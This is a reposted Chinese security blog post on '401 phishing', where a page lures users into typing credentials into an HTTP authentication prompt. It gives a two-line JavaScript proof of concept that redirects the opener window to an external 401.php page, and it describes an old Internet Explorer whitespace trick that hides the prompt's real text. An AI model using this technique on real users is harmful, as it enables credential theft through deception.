401钓鱼新玩法,反向401钓鱼

admin 2021年4月3日19:25:52评论9 views字数 183阅读0分36秒阅读模式

前段时间401钓鱼很火,大部分呢是通过向网页插入一个401地址的图片进行钓鱼.但这种方法对于chrome和不支持外链图片的站来说,例如:微博.

反向401钓鱼:

反向401的意思是通过opener.location反向控制调用页地址到401钓鱼页面.

poc:

opener.location='http://mmme.me/401.php'
close();

401.php:

缺点:IE不支持.

腾讯微博demo

IE空白符缺陷:

由于IE的401询问框设计错误,导致我们可以在服务器响应的认证提示信息后面追加大量的空白符将后面的默认内容挤掉,达到欺骗的目的.

POC:


IE8:

IE9:

http://pkav.net/2013/01/314.html

留言评论(旧系统):

sky @ 2013-01-03 07:03:56

核大哥...这个肿么玩 给个玩法行不?

本站回复:

文中不是已经说明了吗?还给了例子。

文章来源于lcx.cc:401钓鱼新玩法,反向401钓鱼

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:25:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   401钓鱼新玩法,反向401钓鱼https://cn-sec.com/archives/322425.html

发表评论

匿名网友 填写信息